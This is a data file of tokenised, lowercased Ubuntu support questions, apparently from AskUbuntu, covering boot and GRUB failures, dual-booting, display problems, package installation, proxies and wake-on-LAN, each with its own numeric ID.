401288	view desktop - quetzal	i have ssh 'd in via putty from a windows machine . i would like to remote in using a desktop gui or access it and see the desktop - so far , not seeing it . what is the rdp port if applicable , and what if any , are other settings to look for and set . currently when in an ssh session , typed `` gdm '' and later `` start gnome '' but nothing happened with either attempt at the command line . ( also , i checked here for desktops installed - ls /usr/share/xsessions and gnome-classic , gnome and gnome-fallback and ubuntu are desktops listed. ) most of the other solutions had a physical box to log into to change settings from the desktop to then remote to it from another box . thanks !
401292	kind of 80211 registery error	after i press the power bottom within some seconds thin info appears [ 8.954207 ] info @ wl_cfg 80211_attach : registered cfg80211 phy what is this ? it is an error ?
401294	ca n't boot gpt + raid + lvm disk	i bought a pair of 3tb disks to replace some existing 2tb disks in my kubuntu system . i partitioned them both using gpt , making a small `` bios_grub '' partition on both : root @ allhats2 : ~ # parted /dev/sda print model : ata wdc wd30efrx-68e ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049mb 2097mb 1049mb 1 bios_grub 2 2097mb 3001gb 2998gb primary raid root @ allhats2 : ~ # parted /dev/sdc print model : ata wdc wd30efrx-68e ( scsi ) disk /dev/sdc : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049mb 2097mb 1049mb boot bios_grub 2 2097mb 3001gb 2998gb primary root @ allhats2 : ~ # then i did a mdadm -- create /dev/md127 -- level=1 -- raid-devices=2 /dev/sda2 /dev/sdc2 to make them into a raid-1 , did a pvcreate , vgextend , pvmove , vgreduce , pvremove to move all the content from the old disks to the new ones . ran dpkg-reconfigure on both of my installed kernels to make sure they had gpt support in the ramdisk . ran grub-install /dev/sda and attempted to boot . i got two messages from grub telling me something about bad sectors in fd0 ( which is odd , because i do n't have a floppy drive ) , and then it complained it could n't find lvm/lvm2-boot , which is the boot partition , and dropped me to the dreaded grub-rescue prompt . if i plug the old disks back in , it boots fine . the old disks are not in the vg , although their raid re-assembled itself . i do n't want to keep these old disks on my system doing nothing - as a matter of fact , i wanted to run seatools on them and get a report so i can send them back to seagate for a replacement . any suggestions for booting from a gpt raid lvm system ? this is kubuntu 13.04 with kernel 3.11.0-15-generic x86_64 , and : ii grub2-common 2.00-19ubunt amd64 grand unified bootloader ( common ii mdadm 3.2.5-5ubunt amd64 tool to administer linux md array ii lvm2 2.02.98-6ubu amd64 linux logical volume manager ii parted 2.3-16ubuntu amd64 disk partition manipulator update looking through the output from grub-install -- debug , it appears that grub-bios-setup goes through the various partitions of the old disks looking for stuff , it does n't do so for the new disks . so while i see stuff like this : /usr/sbin/grub-bios-setup : info : scanning for mdraid1x devices on disk hostdisk//dev/sdb . /usr/sbin/grub-bios-setup : info : found array md/128 . /usr/sbin/grub-bios-setup : info : inserting hostdisk//dev/sdb into md/128 ( mdraid1x ) for the old disks , i do n't see any such scanning going on for /dev/sda . consequently , there is no mention of md/127 , the raid on the two new disks . that would at least explain why it could n't boot - it 's unable to assemble the raid , and so unable to start the lvm that lives on it .
401296	running key remap script at startup	i 'm trying to re-map my left alt key to the alt gr and alt gr to left alt . so far i 've been able to do it in terminal , but it never runs it on start up . i 've read multiple askubuntu questions , but none of them have worked so far . i have tried multiple commands and methods , but none of them worked putting the script in /etc/rc.local as : sh /home/dani/scripts/altgr_to_alt.sh adding it in cron @ reboot sh /home/dani/scripts/altgr_to_alt.sh @ reboot bash /home/dani/scripts/altgr_to_alt.sh /home/dani/scripts/altgr_to_alt.sh putting it in /etc/init.d/ /etc/init.d/alt_to_gr.sh adding it as a startup program , the command being /home/dani/scripts/altgr_to_alt.sh sh /home/dani/scripts/altgr_to_alt.sh
401297	why wo n't my passphrase work	cryptsetup : evms_activate is not available i am new to ubuntu and after everything i am stuck here , i type in my password and press enter and nothing happens .
401300	is there package i can install for using a webcam as a document scanner ?	my scanner recently broke and i 'm looking for a way to scan multi-page documents using my web camera . ideally , i 'd like some sort of program that would analyse/average multiple images from the webcam to produce a crisper image inside a program like xsane . if i had a better camera i could probably just take a picture with cheese / kameraka and then aggregate the output and convert to pdf . however , my webcam quality is too low , and i 'd prefer the capture program to be be aggregating the images into a single file .
401301	ubuntu 12.04 , 13.04 : can not login to account returns to login screen	question in ubuntu 12.04 and 13.04 ( and probably 13.10 ) i made some changes to my graphics settings . after rebooting when i attempt to login to my account the screen flashes black the bounces me back to the login ( lightdm ) screen . my password is correct and i can log in on a guest account . why by richard stallman 's scraggly beard does this keep on happening ! !
401302	having problems with grub prompt	updated from 12.04 to 12.10 . ubuntu wo n't startup . would n't reach login screen . i booted ubuntu from disc , and did boot repai , then restarted , and went to a terminal like thing with prompt `` grub > '' . please help . here 's link http : //paste.ubuntu.com/6707006/
401304	how do i get rid of white lines on top of my screen ( ubuntu 13.10 ) ?	i recently installed ubuntu 13.10 and it 's great so far , but i am having an issue with white lines appearing on the top of my screen . they stretch from one end of the screen to the other ( left to right ) . i do n't think my screen has a problem because when i lock my computer there are no white lines , its very strange . it 's not a huge problem , but i would like a fix .
401306	no matter what i think of trying starcraft 1 refuses to run fullscreen	everything i have thought of doing to try to get starcraft 1 to run in fullscreen with dual monitors without wine disabling my monitor that is n't running the game has seemed to not work so far these are the options i 've tried so far : in configuring wine , i 've tried : adding starcraft to the list of applications so that `` starcraft.exe '' ( without quotes ) is in the list , then going to the graphics tab and enable the `` emulate a virtual desktop '' setting an set the `` desktop '' at 800x600 . the problem : the game loads and plays but is still windowed at 800x600 ( or whatever the game 's resolution is ) while the rest of the screen is black . running starcraft 1 without a virtual desktop . the problem : starcraft runs in fullscreen like i want , but it disables the monitor the game is n't running on which is exactly what i do not want ( i want the other monitor not running the game to still be enabled and accessible ) but i end up having to re-enable the disabled monitor since wine does n't re-enable it after exiting the game . very tedious and annoying having to re-enable it . what can i do to get wine to get wine/ubuntu ( with xfce ) to get starcraft to run in fullscreen without disabling my other monitor and prevent it from running starcraft in a `` windowed mode '' ?
401308	keyboard command for gnome-control-center ubuntu 13.10	as much as i tried to figure this out i simply can not get this to work out the way that i want it to . now the usual commands in the terminal command line would be gnome-control-center now normally this command does n't like to work for me unless i add sudo in front of it . such as : sudo gnome-control-center ; which prompts me for the usual password , and after which it works like magic . but what i would really like to know is what the title has it as . what is the keyboard shortcut command to launch the gnome-control-center . or as the window its self has it : `` system settings . '' i hope this question is n't terribly convoluted . especially in spite of all the research i did to come up with nothing any way .
401314	no sound icon in one user	there is no sound icon in my user account , but it 's there on the login screen and in the guest account . i have already reinstalled the indicator-sound from the command line ; any suggestions ?
401315	dual booting windows 7 and ubuntu 13.10 . windows 7 is n't showing up	i have windows 7 loaded onto my computer . i have never used ubuntu before and decided to do a dual boot . i installed it as a dual boot and i had the installer create the partition ( i did not create it myself ) . when i booted it up , it shows ubuntu 13.10 and windows 7 . i could access both , but ubuntu 's display was too big for my screen . i found a page that said to enter : 'sudo apt-get update ' and 'sudo apt-get dist-upgrade . ' i did both and restarted . i got the black screen whenever i loaded ubuntu , but i could still access windows 7 . i then put the install disk back in and said to reinstall ubuntu with all settings staying the same . now when i boot i get to the menu , and all ubuntu options are there , but windows 7 is not . i looked on the hard drive and windows 7 is still there . i need help keeping the ubuntu settings as is , and brining windows 7 back to the boot menu . thank you !
401317	unable to access windows partition anymore	i have a dual-boot system with windows 7 and ubuntu 12.04 . i was earlier able to access windows partition from ubuntu but that is not happening anymore . i do n't even see the partition icon now . please help .
401319	installing libbswabe for cpabe toolkit	checking for glib - version > = 2.0.0 ... no * could not run glib test program , checking why ... the test program failed to compile or link . see the file config.log for the ** exact error that occured . this usually means glib is incorrectly installed .
401320	how can i get ubuntu running again ?	i installed ubuntu 12.04 32-bit ( usb ) on my aspire one with windows vista and it seemed to work just fine up until i closed my laptop so it could sleep . when i attempted to work on my laptop again a fuzzy screen appeared and would n't return me to ubuntu . i restarted it and it told me it could n't find any operating software .
401323	how to run installed windows 8 along ubuntu , after installing ubuntu in legacy mode ?	i have a lenovo ideapad with pre-installed windows 8.1 in order to install ubuntu i disabled secure boot and changed boot mode from uefi to legacy . this allowed me to install ubuntu and the grub loader is also showing an option to either boot into windows or ubuntu , but whenever i try booting to windows it says can not load . this happens because the boot order is set to legacy mode and windows 8 will boot only with uefi . i am unable to access my bios from where i can change the boot order . i press f1/f2 on booting but it does n't load the bios , and directly goes to the grub loader screen . how can i make my windows 8 run along with ubuntu ?
401324	ca n't hear the other person in skype but they can hear me	i downloaded from the skype website and installed through the software center . am running 13.10
401325	purple screen on boot ubuntu 13.10	i installed ubuntu 13.10 ( win8 is first os ) from liveusb , but it does n't boot . booting stuck on purple screen after choosing ubuntu in grub ( windows boots without any problems ) . i tried to choose recovery mode on different kernels , but booting stucks on second line `` loading initial ramdisk '' . hdd diode does n't blinks . booting with `` nomodeset '' does n't help . grub2 menu appears only after use boot-repair . i have asus u24a with intel hd graphics 4000 , may be a problem in the drivers , but i do n't know how to solve this problem . i am desperate to find a solution to this problem . i would be very grateful for help . thanks .
401328	strange keyboard behavior on second user account	i 'm using kubuntu 12.04 and on my account i have no problem writing using dead keys ( that is : ' + e to get é and so on ) for the following symbols á , é , ö , ñ , etc . however , i had to setup a second account for another user and i have n't been able to configure it to do the same . as far as i can tell the configuration is the same in both accounts . i have ( in both accounts ) english ( ee . uu . ) international alternative and spanish latinamerican as my prefered layouts . in my account i 'm able to write using dead keys without a problem with both layouts , however , on the new account no matter what layout i choose ( same as in my account , english with dead keys , english with altgr and dead keys , etc . ) i ca n't get the accents and ö , ñ to work . since the second account is for a spanish speaking user , it 's crucial to have the accents working . it might be that on my account i have something installed that 's not present on the second account , but i do n't know for sure . any suggestions on what might be happening and how it can be fixed ?
401329	how to compile and upload a bash script	i found this script interesting : how can instantaneously extract text from a screen area using ocr tools ? how do i compile a script , upload it to ubuntu repository and make it available with apt-get ?
401331	how do i get the latest software version without worrying about dependencies ?	so i 'm using ubuntu 12.04 and glabels 2.2.8 . the only problem is that glabels 3.0+ have been available for a loooooong time now . i want to install glabels 3.0 just by downloading the deb and installing it ( like every other windows computer gets to do by the way ) , but no , i do n't have all the right dependecies installed . so i start downloading all of those and installing them one by one . then i learn that those dependencies have dependencies and so on . how on earth can i just download the latest software version with everything included in one installer package and install it ? i just want the latest and greatest version of the software that i like to use.i waited forever for ubuntu to get the latest version of miro added to the repository .
401333	ubuntu os performance issue	we are facing performance issue last 1 month onwards on one of ubuntu server , actually issue is in server some process is taking more utilization , after that it 's hung the server and also blocking the all the servers in the network . last 3 days on wards we have observer-ed one of dev and php process is taking more cpu utilization we have kill the process in server immediately new process will be generating on server . kindly help on this request , if you required any more information regarding this request kindly post on the request . note : issue facing with system user www-data is generating the process .
401335	what should i do after reset ?	in addition to the popular question what should i do when ubuntu freezes ? . lately my laptop had to be rebooted a couple of times . and i do n't know why . what is the standard procedure to debug a program ? how to use log files , which log files are useful and how to interpret them ?
401341	how to allow freeswitch to bind to nonlocal ip	allow freeswitch to bind to nonlocal ip ? or how to allow any applicatio to bind to nonlocal ip ?
401342	how to download pygame in python3.3	i am using ubuntu 13.10.i have both python 2.7 and python 3.3.i have installed pygame properly in python 2.7.how can i install it in python3.3.does pygame support python3.3 or not ?
401344	why there is no default google task integration with evolution mail ?	i have found an application on android device which is having an better integration on android device which is named as task and this application is developed by tam tasks how does this team are able to sync the task from the android device to the google , they do n't have any problem in this , so can somebody can dig into it so that this same function can be achieved from evolution by developing any plugin for it . the product is listed on this url : https : //play.google.com/store/apps/details ? id=ch.teamtasks.tasks & hl=enenter link description here
401347	controlling the stereo output levels separately from overall volume level	i do n't know why , but to get my right loudspeaker sounding equally loud as the left one , i have to set the levels in alsamixer like so : http : //s18.postimg.org/91nx9ojex/alsa.png 54/100 in headphones column . it is inconvenient for me , because when i habitually try to control overall sound level by fn+up/down , it resets the left/right levels balance . so is there any way to permanently set stereo levels separately in some alsa/pulseaudio configuration files or utilities ?
401349	strange , unwanted entry in printer dialog ( brother hl2270dw )	i got this wireless printer and got it working without issues on 13.04 , but since i upgraded to 13.10 there has been this weird issue with the printer and i have n't been able to find any help because i do n't even know what to search for . basically , the problem is the additional entry that appears in the print dialog . as you can see , there are three printers listed : print to file the printer i added ( located in `` 2nd option '' ) . this is how it looked in 13.04 . a third , weird , out of nowhere printer that does nothing except crash the printer if it 's simply selected ( no additional dialogues or anything , it just messes up the printer and i have to reset it because it stops working for other people in the network ) until recently , that third entry seemed to do nothing , but now it shows the status message toner low , but the printer i usually choose to print does n't show anything . the toner is in fact low , but i do n't know why that message appears in that unusable printer entry and not the usable one . as for that number that is the useless printer 's name , i could n't find it anywhere except in the `` new printer '' dialog : if i add the printer choosing the first option under network printer ( brw00 ... ) , the added printer does n't work ( it 's there but it does nothing ) . if i choose the second option ( brn30 ... ) , the added printer works as intended . regardless of the choice , the weird printer will still show up in the print dialog . the entry i wish to get rid of does n't appear in the libreoffice print dialog for some reason . i do n't know if the problem lies with cups , the printer drivers , or some botched installation of the drivers , but i 'd appreciate any help from anyone who might know what 's going on . although i can somehow live with this issue , i worry that i will accidentally select the weird printer and be forced to reset it completely .
401354	error while installing oracle 10g on ubuntu 12.04	i get the following error while installing oracle 10g on ubuntu 12.04 e : unable to locate package oracle-xe
401357	can i hurt my ubuntu system by installing lxde	i have ubuntu 12.04 lts and recently installed lxde . i had heard that it could damage the unity ... but there was no confermation of the bug i havent had issues yet but was wrorried that they could arise ... tech info : os : ubuntu 12.04 lts , memory : 993.1 mib processer intel ( r ) cpu t2050 ( dual core ) @ 1.6 ghz ( 1600mhz ) , os:32 bit ... . im using an hp pavillion dv5220us i have a clean install ( was done within a day of this post ) i am not dual booting i installed lxde via usc package installed : lxde ( the lightweight x11 desktop environment ) add ons : archiver for .arj galculator minmalist music player for lxde ( lxmusic ) freedesktop.org menue compliant window manager scripts package manager for rpm command line screen capture utility automatic screensaver for x package version : lxde 0.5.0-4ubuntu3 license : open source
401359	whether to go 64 bit or 32 bit on ubuntu 12.04 lts ?	i am new to ubuntu os , i am in confusion whether to go for 32 bit or 64 bit . configuration : processor : intel® core™ i3-3210 cpu @ 3.20ghz × 4 ram : 4gb i mainly used my pc for office work . i want to switch from windows to ubuntu for security and performance . i only need the following programmes on my pc lamp sublime text editor skype dropbox chrome vlc please suggest me the best one . what should i install 32 bit or 64 bit . my pc should works like charm and run very fast . thank you
401363	ca n't boot single user	i want to be able to boot single user in order to repartition due to a failing raid array . ( my boot loader and root partition is not on the raid array . however , my /var is which is what i need to move until i can rebuild the array . ) i 'm running 12.04 and can boot to runlevel 2 no problem . when i try to boot to single user by selecting recovery in grub or by editing the command line for normal boot and adding `` single '' or `` 1 '' i just get a blank screen ( even without the quiet and splash options ) and all activity stops after a few seconds . i 've also tried to simply run ubuntu from usb , but the standard installation image fails with inotify_add_watch ( which seems to be related to raid ) while the alternate comes up but wo n't mount my non-raid disk to /target in the shell . not being able to enter single user mode for maintenance makes me nervous ... . any advice on how to debug or figure out where the problem is ?
401364	updateand cdrom	after some time of use i got a red triangle on the upper right corner of the screen with an exclamation point telling me that something is wrong with the updates and that i should manually check what updates are available . clicking on that message opens the update manager and by pressing the check button i get this : failed to download repository information check your internet connection . by clicking on details i get : w : failed to fetch cdrom : // [ ubuntu 12.04 _precise_ - build amd64 live binary 20130424-09:51 ] /dists/precise/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : // [ ubuntu 12.04 _precise_ - build amd64 live binary 20130424-09:51 ] /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . since my internet connection is surely ok , what is it that i need to do ?
401365	creating usb boot drive on mac os	i have followed the instructions for creating a bootable usb drive on my mac for use on another non-mac machine . the non-mac machine is not booting off the new usb drive . i notice that in the instructions here ( http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx ) it mentions that macs tend to append the .dmg suffix to *.iso . if that happens -does anything need to be done ? the sudo dd commands seemed to work . i am trying to determine if i created a good bootable usb drive or if my problem lies elsewhere . thanks ,
401367	defining php executable location in aptana studio 3	i want to use aptana studio 3 but when i run any project a window appears that says select a way to run file.php which has two options php script and php server . when i select php script it shows a window the current debugger does not have any defined php executables . please define a php executable location before continuing and a window appears that has option for adding new php interpreters . can anybody tell me how to do this configuration ?
401368	is it normal for software & updates to always show i 'm up to date ?	for the last month on my ubuntu 13.10 system , software and updates always shows that the laptop is up to date . i tried to change the server for updates but with the same result . so is it normal ?
401370	where i find the usb-creator.exe that was included in previous versions of ubuntu ?	back about 10.10 the live cd contained a windows executable named usb-creator.exe ( it was a windows version of startup disk creator ) . is an up to date version of this file still available ?
401372	ibus keeps getting restarted with panel indicator disabled in 13.10	when i upgraded to 13.10 i discovered that ibus ( which i use to enter ipa characters ) is completely broken so i manually downgraded it from 1.5 to 1.4.2 and locked it ( i had to put a raring repository in my sources list to do this ) after i did this everything was working fine , but now i find that the indicator has gone missing from the panel . from boot the daemon is running $ ps -ef | grep ibus toby 8023 8022 0 12:29 ? 00:00:00 /usr/bin/ibus-daemon -- replace -- xim -- panel disable toby 8024 8023 0 12:29 ? 00:00:00 /usr/lib/x86_64-linux-gnu/ibus/ibus-gconf toby 8027 1675 0 12:29 ? 00:00:00 /usr/lib/x86_64-linux-gnu/ibus/ibus-x11 -- kill-daemon toby 8034 8023 0 12:29 ? 00:00:00 /usr/lib/ibus-kmfl/ibus-engine-kmfl -- ibus i think the -- panel disbale bit could be the problem when i kill the ibus-daemon process then start it again with ibus-daemon -- xim -- replace the indicator appears and it works , but this is short lived as the panel-disabled version of the daemon pops up again to replace it within 30 seconds . i 've looked and ca n't find what keeps reinitialising the ibus daemon with this option . ps -eah includes this output : 1080 ? 00:00:00 lightdm 1143 tty7 00:02:44 xorg 1298 ? 00:00:00 lightdm 1675 ? 00:00:00 init 1744 ? 00:00:00 ssh-agent 1790 ? 00:00:13 dbus-daemon 8312 ? 00:00:00 dbus-daemon 8313 ? 00:00:00 ibus-daemon 8314 ? 00:00:00 ibus-gconf
401374	ubuntu 12.04 installation error	i am trying to install ubuntu 12.04 in separate partition ... i already have windows7 installed in c drive which is the default os . earlier ive installed ubuntu in the same separate partition and used it for long time . but due to some windows7 problem i had to unistall the ubuntu ... . but now when i try to re-install ubuntu in the same partition which is my disk f ... .it shows some .iso file error and shows initramfs_ ... ... and installation doesnt proceed further ... what would be the solution for this problem ... . ( ive tried to format the drive and then re install.. , but it was of no use )
401375	error authentication . ( http 401 ) on glance index	i 'm on progressin installing openstack havana on ubuntu 12.04 machine . now i 'm configure glance . i have problem on execute command `` glance index '' and glance import $ glance image-create -- name=cirros -- disk-format=qcow2 -- container-format=bare -- is-public=false -- location=cirros-0.3.0-x86_64-disk.img the request you have made requires authentication . ( http 401 ) or $ glance index the request you have made requires authentication . ( http 401 ) i just following step by step from http : //www.revolutionlabs.net/2013/11/part-1-how-to-install-openstack-havana.html i just modify sql connection , keystone auth token on /etc/glance/glance-registry.conf and /etc/glance/glance-registry-paste.ini sql_connection = mysql : //glance : glance @ 192.168.2.123/glance ... auth_host = 192.168.2.123 admin_tenant_name = service admin_user = glance admin_password = mypassword . .. flavor = keystone any missing configuration so that i got error message like that ? thanks
401381	3.2.0-58-generic on 12.04lts seems to break nfs	after an upgrade which included the linux-image-3.2.0-58-generic package the nfs v3 client on an older sun ws failed . it would mount the share ok but then when attempting to ls would give this message : nfs readdir failed for server joy : error 2 ( rpc : ca n't decode result ) when i rebooted to the 3.2.0-56 or 3.2.0-57 kernel it is ok again . is this a known bug or is there a fix/workaround or config change i am missing ?
401384	error ubuntu 13.10 blackscreen	i installed ubuntu 13.10 in my pc recently , also installed eclipse , qt creator , blender and synaptic ( to download all the packages in order to work with opencv ) everything went fine until i shut down the computer and then later , when i tried to log in ubuntu , put my password an everything , the screen went black , and only the pointer appeared.. tried several things to fix it but nothing work so i re-installed ubuntu , and all the programs again but testing re-starting the computer after every installation , and all of them work except for the opencv packages , after installing them the blackscreen problem came back . if anyone can help me please i 'll appreciated a lot
401388	installing without a disc drive	my hp computer doesnt have a disc drive due to it being slim line . i keep getting to the end of the download and it says i have no where to burn the ubuntu booting file - my external hard drive is connected . is there a way to get ubuntu without a disc drive on windows 7 ? cheers
401389	overheat after install ubuntu please	laptop suddenly shutdown due to overheat . before my laptop suddently shutdown , my fan run faster . there any coding to overcome this problem ? hp pavillion g4-2029wm ram 8gb how to solve this problem ?
401390	running a script on connecting usb device	please do n't mark this as duplicate as this is a different question ! i am trying to run a script whenever a pendrive is connected to my system . i followed this and this question and it is working but still there are some problems . this is my udev rules file : action== '' add '' , attrs { idvendor } == '' 8564 '' , attrs { idproduct } == '' 1000 '' , run+= '' /usr/local/my_script.sh '' and this is my script : # ! /bin/bash env > /tmp/env.out cp -r /media/*device-name*/* ~/test/ i have 2 questions : 1.whenver i plug in my usb device script is executed because a file env.out is generated in /tmp but the data from usb device is not copied in to test directory , if i run the script manually then it works fine ! why ? ? 2.how can make my rules file more general so that it will work for any usb device which is connected without knowing its id ? my idea behind this is to copy all the data from connected usb device to my computer automatically , when it is connected . thanks in advanced !
401391	error removing initramfs tools ( fresh install )	i have seen a few other people with this issue , but they have an existing install that they can drop into to fix it . i do n't ! so , i am trying to install xubuntu 13.10 using a live usb , and in doing so i have intentionally formatted the installation partitions ( all my data is safely floating in the sky ) . everything seems to work until right at the very end i get the message : error removing initramfs-tools : subprocess installed post-installation script returned error exit status 1 the only thing i can think of is that some partition somewhere is n't big enough ... i have : sda1 /swap 512mb sda2 /boot 56mb sda3 /home 32gb sda5 /var 4gb sda6 /opt 4gb sda7 / 31gb any advice at all would be welcome as at the moment i have a totally unbootable system following the attempted install . booting to gui hangs at the splash screen . trying ctrl + alt + f1 from there does not give a login prompt . booting into recovery and dropping to root shell leaves me with no partition other than sda7 and sda5 mounted , all the other partitions refuse to mount ! if i attempt to mount , for example sda2 then : # mount -t ext4 /dev/sda2 /boot mount : /dev/sda2 already mounted or /boot busy edit : now cross-posted to http : //ubuntuforums.org/showthread.php ? t=2198405
401392	black screen after clicking on “install ubuntu”	secure boot is disabled i also wrote in the command-line `` nomodeset '' ... [ error : ca n't find command nomodeset ] tried to install an alternative ubuntu 12.04 , but there was a black screen too . video card : nvidia geforce gt 640m
401396	unable to find entry_32.s file in ubuntu 12.04	i am having ubuntu 12.04 installed on my system , and the kernel version is 3.8.0-29 generic . root @ heena : /usr/src/linux-headers-3.8.0-29/arch/x86/kernel # uname -a linux heena 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux i am looking for the system call implementation file . it is reported in where-is-file-entry , s in v2-6-39-4 , but in my version i am unable to find it . can some one help me out .
401400	how do i find the program to associate with a file on the web ?	i 'm not so good at wording questions , but i 'll try and explain it . on a website webupd8.org , there are some orange boxes that has `` available on the sofware centre '' written on it . when i click on it i get the `` launch application '' dialogue box . assuming that it is like clicking on a link for the google play store that opens up the play store app on your phone , i hit `` choose '' to look for the `` ubuntu software center '' . i ca n't find it though . am i looking for the wrong thing ? how to i make manual file associations in the future ?
401408	glassfish updatetool error loading libpangoxft-1.0.so.0	i 've installed glassfish using the intaller downloaded from the home page of the program . when i try to run updatetool i get the following error : glassfish update tool does not support running in `` it_it.utf '' locale . attempting to use english locale . wx import error . verify the wx widgets are in the pythonpath . the following can be reported to glassfish update tool 2.3.5 traceback ( innermost last ) : file `` /opt/glassfish/updatetool/vendor-packages/updatetool/common/boot.py '' , line 283 in init_app_locale import wx file `` wx/__init__.py '' , line 45 , in ? file `` wx/_core.py '' , line 4 , in ? importerror : libpangoxft-1.0.so.0 : file not found ( my translation ) already installed libgtk2.0-0 : i386 , libpangoxft-1.0-0 and lsb . i 'm using ubuntu 13.10 64bit . what should i do to run the program ?
401409	ubuntu reboot shows white dash ( - ) after update/upgrade	i upgraded and updated my system and it asked to restart . when i restarted the system stuck with a white dash and not showing anything else . i tried to run boot repair from remote login but it did not help . i got following text after boot repair . http : //paste.ubuntu.com/6707925/ thanks for the help in advance
401410	what exactly is generic version of ubuntu ? how it differes from other versions ?	root @ heena : /usr/src # ls linux-headers-3.8.0-29 linux-headers-3.8.0-29-generic also : root @ heena : / # uname -a linux heena 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux question # 1 : why do i have those two linux folders in /usr question # 2 : what is the meaning of generic version ? it seems my version is generic .
401411	ubuntu apps forums	is there any dedicated forum to discuss about ubuntu touch for developing mobile applications using qml . is there any perfect documentation regarding using qml of ubuntu touch apps development . please share the links .
401415	problem in python3.3.2+	i am using ubuntu 13.10.i have 2 versions of python.python2.7.6 and python3.3.2+ . ( i do n't know what is the '+ ' sign ) whenever i open python 3.3.2+ and type print `` hello . '' .i get the invalid syntax error.whereas in python2.7.6.i have no problem.please can anyone help me out ?
401419	apt-get not working behind socks proxy	i am trying to connect a ubuntu 12.04 machine to a socks proxy server . i have my 192.168.30.0/24 lan , and dante socks proxy server is running on 192.168.30.134:1018 . i have also an pfsense router on 192.168.30.31 which creates a inferior lan 192.168.1.0/24 . in this inferior lan , i have an ubuntu client machine and i need to connect it to my proxy server , so that all traffic on this machine is proxied . i have configured socks proxy in global ubuntu settings . pfsense firewall is configured to allow direct connection from lantowan only to my socks proxy server ( and also my local dns and google dns ) . all other traffic is blocked ( because it should go through my proxy server ) . browsing is working ok so i know it is configured right and going through proxy , but i can not get apt-get update and etc . commands working . i was trying to configure proxychains or dante-client to run it with proxychains or socksify prefix but it does n't work . socksify gives no result , and proxychains just give me failed to fetch http : // ... ... . connection failed type of errors when i run it as a root . how can i get apt-get working ? is it possible to manage it without any third party ( dante-client , proxychains , etc like ) client ?
401423	recovery mode freezes and no options turning up	i am currently running a dual boot of windows 8 and ubuntu 12.04 . i recently had several problems with ubuntu ( like lost password etc ) , so i tried booting through the recovery mode . but unfortunately , everytime i run the recovery mode it loads up some processes and then freezes , as in nothing happens after that , it just keeps on waiting there . my specs are : ubuntu 12.04 lts release 12.04 ( precise ) 64-bit kernel linux 3.2.0-58-generic gnome 3.4.2 intel® core™ i5-3210m cpu @ 2.50ghz × 4
401424	not able to launch 13.10 installer on asus n56j	after a few seconds of running ubuntu os installer black screen occurs as shown :
401428	secondary monitor on ubuntu 12.04 resets to a lower resolution	i have a ubuntu 12.04 pc with 2 monitors - a 17 '' 1280x1024 lcd and a 23 '' 1980x1080 lcd . the 17 '' monitor is shared by 2 pcs via a vga kvm switch , and sometimes when i switch back to the ubuntu pc , the resolution resets to a lower resolution . once i start display settings , it will automatically reset back to 1280x1024 . why does this happen , and how can i fix it ? thanks .
401430	failed to upgrade ubuntu 12.10 to 13.04 beacause package size mismatch	i was upgrading my ubuntu 12.10 to 13.04 , using following command : sudo do-release-upgrade everything is ok until i get following error message : could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/account-plugins/account-plugin-facebook_0.10bzr13.03.26-0ubuntu1.1_amd64.deb size mismatch failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/f/friends/friends-facebook_0.1.3daily13.04.17.1~13.04-0ubuntu1_all.deb size mismatch restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done what should i do for this ?
401431	e : unable to locate package lamp-server	i am trying to install lamp server in ubuntu 13.10 . but it gives the following error . e : unable to locate package lamp-server
401433	wake up on lan on access without magic packet	i have installed ethtool and ran `` ethtool -s eth1 wol g '' to allow my server to wake up on magic packets , this works but is not quite what i want . my server only gets accessed from within my home network . before i changed my server to ubuntu i had a windows server , it was set up so when ever i tried to access a mapped network drive it would bring the computer out of sleep mode , then after 40 minutes of been idle it would go back to sleep until accessed again , the server only ever gets accessed manually so it stayed asleep until needed . i did this by selecting `` allow this device to wake the computer '' on the network card power properties via device manager . i then deselected the box that said wake up with magic packet only . i know there is different letters instead of `` g '' on this command `` ethtool -s eth1 wol g '' but not sure which one to use ? does anyone know the commands i need to use to achieve the wake up from lan on demand ? i have searched high and low on the net with no luck : ( any help would be greatly appricated edit : these are the letters you can add at the end instead of `` g '' and apparently what they do . a - wake on arp b - wake on broadcast messages ( only mac ) g - wake on magicpacket ( tm ) m - wake on multicast messages ( multiple ips and mac ) s - enable secureon ( tm ) password for magicpacket ( tm ) u - wake on unicast messages ( ip and mac ) which one should i use ?
401434	from where i download kerenl source code for version 3.8.0-29-generic	heena @ heena : ~ $ uname -r 3.8.0-29-generic also heena @ heena : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise i want to download source code for this version . from where i can get the source code for this ? kernel.org is not having this version listed
401436	why am i unable to login in a terminal window ?	when i open a terminal window i am asked for login and password . but my data that i enter into the system do not work . what to do ?
401441	restarting after installation	i have installed ubuntu 12.04 and it shows that installation is successful . after restarting the system the log in page appears but after 10-15 seconds it disappears . what should i do now
401442	that i 'm must change or add to the grub for the disappearance of a black screen ?	grub snapshot : that i 'm must change or add to the grub for the disappearance of a black screen ?
